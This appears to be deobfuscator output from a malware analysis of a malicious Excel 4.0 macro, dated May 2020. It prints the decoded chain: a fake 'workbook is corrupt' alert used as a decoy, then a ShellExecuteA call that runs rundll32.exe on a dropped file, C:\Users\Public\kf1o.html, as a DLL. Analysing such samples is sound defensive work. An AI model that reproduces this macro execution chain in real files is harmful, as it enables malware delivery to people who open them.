

May 26th, 2020
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  19. XLMMacroDeobfuscator(v 0.1.4) -
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  181. CELL:R34029 , FullEvaluation , [TRUE]
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  183. CELL:AB61478 , FullEvaluation , ""
  184. CELL:AB61479 , FullEvaluation , RUN(Sheet2!HS53443)
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  187. CELL:DD49036 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
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  189. CELL:AR2923 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
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  191. CELL:DU54329 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  192. CELL:DU54330 , FullEvaluation , GOTO(IQ45681)
  193. CELL:IQ45681 , FullEvaluation , "=""C:\Users\Public\kf1o.html"",DllRegisterServer"
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  201. CELL:DU54329 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  202. CELL:DU54330 , FullEvaluation , GOTO(IQ45681)
  203. CELL:IQ45681 , FullEvaluation , "=""C:\Users\Public\kf1o.html"",DllRegisterServer"
  204. CELL:IQ45682 , FullEvaluation , GOTO(EH4304)
  205. CELL:EH4304 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","=""C:\Users\Public\kf1o.html"",DllRegisterServer",0,5)
  206. CELL:EH4305 , FullEvaluation , GOTO(FE5114)
  207. CELL:FE5114 , End , CLOSE(FALSE)
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  209. CELL:FE5114 , End , CLOSE(FALSE)
  210. [END of Deobfuscation]
  211. time elapsed: 9.589247465133667
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